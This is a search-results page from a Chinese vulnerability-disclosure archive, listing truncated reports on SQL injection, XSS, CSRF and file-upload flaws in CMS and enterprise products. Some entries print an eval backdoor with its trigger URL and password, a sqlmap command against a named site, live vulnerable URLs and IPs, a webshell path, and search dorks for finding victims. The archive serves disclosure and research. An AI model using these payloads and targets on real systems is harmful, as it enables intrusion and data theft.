56796 matches found
Discuz /source/plugin/nds_up_ques/nds_ques_viewanswer.inc.php SQL注入漏洞
No description provided by source...
TSPB /TSPB/web/pubinfo/pubInfoContent.jsp SQL注入漏洞
No description provided by source...
用友某重要系统任意文件上传漏洞之二
简要描述: 用友某重要系统任意文件上传漏洞之二 详细说明: 用友GRP-U8 财务管理软件 该servlet存在漏洞,可直接上传任意文件到服务器 None 这里为:http://210.44.112.101https://images.seebug.org/upload/chopper.jsp chopper 5个案例: http://210.44.112.101/UploadFile http://124.128.96.98:8001/UploadFile http://61.139.105.105:8008/UploadFile...
csrf添加管理员
简要描述: rt 详细说明: 版本:phpshe1.3最新版。其他版本没有测试,请自查 后台管理列表,添加管理员表单没有token导致csrf 漏洞证明: 不想录视频了。我提供代码你们自己测下。 None...
Pragyan 3.0 /index.php SQL注入漏洞
No description provided by source...
KesionCMS多个系统通用SQL注入打包 #可注入任意用户数据 demo演示
简要描述:...
Kesion网校系统存在多处通用漏洞 demo演示
简要描述: Kesion网校系统存在多处通用漏洞 demo演示 详细说明: 共有两处XSS漏洞 可盲打用户、管理员 第一处1 http://e.kesion.com/ask/ 问答频道内容处过滤不严导致XSS漏洞 内容处写入我们的XSS 用户浏览时就会执行 http://e.kesion.com/ask/q-342.html 漏洞证明: 第二处 第二处XSS漏洞出现在资料下载页面的评论处 http://e.kesion.com/model/view.aspx?mid=3&id=4374...
KPPW最新版 6处注入
简要描述: 洞太多啦 详细说明: KPPW 最新版20150327 第一处注入: 漏洞文件:/control/tasklist.php $m = intval$m; $i = intval$i; $s = intval$s; $r = intval$r; $o = intval$o; $pd = intval$pd; $m and $strUrl .="&m=".$m; $s and $strUrl .="&s=".$s; $r and $strUrl .="&r=".$r; $i and $strUrl .="&i=".$i; $pd and $strUrl .="&pd=".$pd;...
nongyou unknown /ExtWebModels/WebFront/ShowLand.aspx SQL注入漏洞
No description provided by source...
某通用型系统SQL注入#九
简要描述: rt 详细说明: 某通用型系统SQL注入九。 源码:XYCMS幼儿园建站系统 v2.1 下载地址:http://down.chinaz.com/soft/33301.htm 注入点:classdetail.asp?id= 可谷歌:幼儿园 inurl:classdetail.asp?id= 案例:http://www.gcdbyey.cn/classdetail.asp?id=164 http://www.pd-goodbaby.com/classdetail.asp?id=124 http://www.fzejx.com/classdetail.asp?id=153...
建站之星重置任意用户密码二
简要描述: 感谢CCTV赞助商采访 感谢WOOYUN大力支持 本漏洞由建站之星全程赞助 独家冠名播出 详细说明: 今天看了看,上一集的漏洞,是修复了。 然后看看有没有可以挑战一下的 恩,赢了 重置密码是邮箱重置,收到链接,如下 http://www.sitestar.cn/member/change.aspx?ctm=MjAxNS81LzIgMTU6MTA6MzY=&un=ODMxNjY4N0BxcS5jb20=&up=cb16979fd5ba7497bbcec4b1157aad11 解密如下...
Qibocms v7 /do/class.php 后门
漏洞相关文件:/do/class.php后门内容解密后内容?phpif$GET'key'=='90sec' @eval$REQUEST'shellcode';?漏洞利用过程后门地址:http://domain/do/class.php?key=90sec密码:shellcode...
E-POWER 1.1 /admin/checkuserpopedom.asp 权限提升漏洞
No description provided by source...
mao10cms存在存储型Xss(已打到cookie)
简要描述: mao10cms存在存储型Xss(已打到cookie) 详细说明: 我先提供用这个系统的网站吧 这些够了吧 官网http://www.mao10.com 我们先来到这个链接http://www.mao10.com/post-group-single-id-283.html 下面有提交评论,我们把他们都填上我们Xss 平台接收的代码 我的代码是 标题可以直接填入,但是内容被过滤了的, https://images.s...
ThinkSAAS SQL注入
简要描述: ThinkSAAS SQL注入 详细说明: 版本 ThinkSAAS 2.32 目前最新版。 app\group\action\do.php 281行 //回复评论 case "recomment": if$POST'token' != $SESSION'token' echo 1;exit; $referid = intval$POST'referid'; $topicid = intval$POST'topicid'; $content = tsClean$POST'content'; $addtime = time; $db-query"insert into...
金蝶企业移动管理云暴力破解+弱口令
简要描述: 如题,金蝶企业移动管理云暴力破解+弱口令,未加验证码和默认口令 详细说明: 问题网址:http://mcloud.kingdee.com/mcloud/pages/ POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1 Host: mcloud.kingdee.com Proxy-Connection: keep-alive Content-Length: 301 Origin: http://mcloud.kingdee.com User-Agent: Content-Type:...
KPPW最新版SQL注入漏洞,修补不严
简要描述: KPPW最新版SQL注入漏洞,修补不严 详细说明: 1.看了http://wooyun.org/bugs/wooyun-2010-086216。这篇帖子,正巧也在审计KPPW,也就去看了用一下最新版对于爆出问题的修补方式。最新版为了防止该漏洞,添加了一个验证。 if$gUserInfo'uid' != $pk'uid' kekezu::showmsg'无权操作',NULL,NULL,NULL,'error'; return false; 2.$gUserInfo'uid'是用户id,是我们不可控的。所以这里不能再用xfkxfk大牛的方法构造uid了。那么我们再看一下save函...
Wordpress Reflex Gallery 3.1.3 /reflex-gallery-php.php 文件上传漏洞
No description provided by source...
Wordpress N-Media Website Contact Form 1.3.4 /classes/plugin.class.php 文件上传漏洞
No description provided by source...
用友软件旗下一网站存在一个Struts2漏洞可拿服务器
简要描述: 用友软件旗下一网站存在一个Struts2漏洞可拿服务器。主要因为漏洞不及时打上,账户权限过大。 详细说明: 今天闲来无事,在网上随意点了几下,发下了个漏洞。 存在漏洞的网址:http://pu.yonyouup.cn/login!loginIndexPage.action 漏洞证明: 首先,这是存在漏洞的网页:http://pu.yonyouup.cn/ 点进去后,会跳转到http://pu.yonyouup.cn/login!loginIndexPage.action ,于是我就猜想,是不是存在Struts2漏洞呢?就试了一下。 结果如图:...
YonYou NC-MA /invoker/JMXInvokerServlet 代码执行漏洞
No description provided by source...
Strongsoft /Plan/FloodPlan/FloodPlanFileUpdate.aspx 文件上传漏洞
No description provided by source...
Ruijie EG Gateway 信息泄露漏洞
No description provided by source...
Hikvision iVMS-8700 Tomcat 任意文件创建漏洞
No description provided by source...
金蝶某运维不当致服务器Getshell(影响内网+10+站点)
简要描述: ... 详细说明: 金蝶 站点:cms.kisdee.com IP: 118.194.40.103 Sqlmap.exe -u "http://cms.kisdee.com/yp/product.php?prowhere=1" -v 3 --dbms=mysql 注入 sqlmap identified the following injection points with a total of 23 HTTPs requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL = 5.0...
骑士CMS某接口1处宽字节SQL盲注之三(官网demo测试)
简要描述: 骑士CMS某接口1处宽字节SQL盲注官网demo测试 详细说明: 手机客户端1处接口存在宽字节SQL注入,无关键字过滤,理论上可以获取任意数据。 http://demo.74cms.com/android/login.php 对应代码: 10 $username=addslashes$username; 11 $password=addslashes$password; 12 $username=iconv"utf-8",QISHIDBCHARSET,$username; 13 $password=iconv"utf-8",QISHIDBCHARSET,$password;...
用友致远A6协同系统敏感信息泄露&SQL注射
简要描述: 用友致远A6协同系统敏感信息泄露&SQL注射,union可shell 详细说明: 1重置数据库账号密码漏洞 /yyoa/ext/byoa/start.jsp 该文件的代码为: 可以看出该文件没有验证任何权限,便进行了重置数据库用户byoa的密码为: byoa 2 mysql+jsp注射 /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp 测试方法 http://www.ssepec.net/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?userids=17 union...
phpcms存在存储型Xss
简要描述: phpcms存在存储型Xss 详细说明: 我已经成功注册了 用户名Z4lx 密码qwe123 然后点击我的信息旁边发布,我这里已经随便写了个信息发布了 信息随便写就行了 发布好了后点击我的信息 然后点击编辑 手机号码那里写入代码 ';alert'Z4l 然后点击保存 然后点击查看归属地 成功弹窗 只要是访问了此页面的 查看归属都会谈http://demo.phpmps.com/view.php?id=110 漏洞证明: 已证明...
Discuz 某插件存储型XSS漏洞
简要描述: rt 详细说明: http://addon.discuz.com/[email protected] 统 计: 共 3,499 次下载,当前版本 3,472 次 inurl:plugin.php?id=ymxinqing 签到是需要登录的。。我就不一个个试了。 插入任意xsspayload 只过滤了 漏洞证明: rs...
ThinkPHP 默认配置导致验证码暴力破解
简要描述: ThinkPHP 默认配置导致验证码暴力破解 详细说明: 最近用Thinkphp时发现,验证码类默认的check函数在检查完验证码是否正确后,并未重置session,导致可被暴力破解。 写这样的代码,再看看Verify类的check函数, public function check$code, $id = '' $key = $this-authcode$this-seKey.$id; // 验证码不能为空 $secode = session$key; ifempty$code || empty$secode return false; // session 过期...
建站之星重置任意用户密码
简要描述: 感谢CCTV赞助商采访 感谢WOOYUN大力支持 本漏洞由建站之星全程赞助 独家冠名播出 详细说明: 我用了2个号作为测试 填写自己邮箱,收到链接,打开。 抓包, 改 漏洞证明:...
kingdee GSiS /kdgs/portal/filedownload/download.action 任意文件下载漏洞
No description provided by source...
cctr k3 /k3/list.aspx SQL注入漏洞
No description provided by source...
蝉知Cms Csrf Getshell
简要描述: get提交某个url即可getshell 详细说明: http://localhost/www/admin.php?m=package&f=obtain 在安装插件的地方 我们随便找个插件安装 先点击“自动安装” 会出来个提示框有个“我同意授权”的按钮 对着按钮右键复制他提交的URL...
Wordpress MiwoFTP 1.0.4 /admin/quixplorer/_include/fun_down.php 任意文件下载漏洞
No description provided by source...
骑士CMS某接口2处SQL盲注#2(官网demo测试)
简要描述: 骑士CMS某接口2处SQL盲注2官网demo测试 详细说明: 手机客户端2处接口存在SQL注入,SELECT注入无关键字过滤,理论上可以获取任意数据。 0x01: http://demo.74cms.com/android/jobs.php ========================================================= 对应代码: 14 if !empty$aset'displayorder' 15 16 $arr=explode'',$aset'displayorder'; 17...
Wordpress Tune Library Plugin 1.5.4 /tune-library.php SQL注入漏洞
No description provided by source...
ourphp逻辑漏洞刷钱
简要描述: 如题 详细说明: 这是demo地址http://demo.ourphp.net 注册个小号上去随便买一件商品 以这件为例 http://demo.ourphp.net/?cn-shoppingcart.html-&ourphpcms=shopping 然后去结算。 结算的时候抓包,将ourphpopcms本来是699的,后面那个改成-100 然后最后结算就-100了 漏洞证明: 以上...
骑士CMS某接口1处SQL盲注#1(官网demo测试)
简要描述: 骑士CMS某接口1处SQL盲注官网demo测试 详细说明: 手机客户端接口存在SQL注入,SELECT注入无关键字过滤,理论上可以获取任意数据。 : http://demo.74cms.com/android/resume.php 代码: 15 if !empty$aset'displayorder' 16 17 $arr=explode'',$aset'displayorder'; 18 $arr1=pregmatch'/asc|desc/',$arr1?$arr1:"desc"; 19 if $arr0=="rtime" 20 21 $orderbysql=" ORDER...
Elastix 2.5 /a2billing/customer/iridium_thread.php SQL注入漏洞
No description provided by source...
shop7z九处SQL注入打包
简要描述: shop7z九处SQL注入打包 提交好几次了 虽然很累 不过想到审核的哥们要审核那么多洞 自己的累确实不算什么 详细说明: 案例: http://www.gzsewing.com http://www.125309.com http://www.nm3g.org http://35dianqi.com http://www.ai04.com http://www.longmm.net http://www.99pwan.com http://www.heimawg.com http://www.hzjdpm.cn http://ptwb.net http://5lmm.cn ...
ThinkOX 1.4.0 /Application/Forum/LzlController.class.php SQL注入漏洞
No description provided by source...
Django 任意文件下载漏洞
No description provided by source...
shopNC O2O系统储存型xss+添加管理员POC
简要描述: 上万网点受影响 详细说明: 0x01 首先有个小问题,绝对路径泄露 0x02 首先注册一个用户,然后到圈子里面发布话题 在发布话题这里存在存储型的xss,其利用过程就是,具体可以参照这篇文章 http://drops.wooyun.org/tips/2031。 在上传附件的地方只对附件的后缀进行的检测,但是没有检测附件内容。导致我们可以把一个swf文件修改成jpg后缀的文件然后上传。其中在嵌入swf文件的时候是allowScript=always。这样就导致了xss的产生。先上传恶意的swf 虽然报错了,但是还是传上去了。 然后在话题处添加一个flash文件,就是我们上传的文...
EduSoho 5.1.4 /src/Topxia/WebBundle/Controller/SearchController.php SQL注入漏洞
No description provided by source...
MyCOM 1.0 /admin/login.php SQL注入漏洞
No description provided by source...
PHPOK最新版CSRF 永久GETSHELL
简要描述: PHPOK CSRF 永久GETSHELL 详细说明: PHPOK 最新版中,在线升级系统配置 可以被CSRF恶意串改。导致更新程序指向黑客的网站。 查看源码不难逆向出XML的构造格式。 \phpok\framework\admin\updatecontrol.php //在线升级 function mainf if!$this-popedom'update' error'您没有在线升级权限',$this-url'update','error'; $info = $this-service4; $rs = $this-lib'json'-decode$info;...
JEECMS /download.jspx 任意文件下载漏洞
No description provided by source...
KPPW 2.5 /control/gy/buyer_order.php SQL injection vulnerability
No description provided by source...
KfWeb /admin/ShowPersonHzList.aspx SQL注入漏洞
No description provided by source...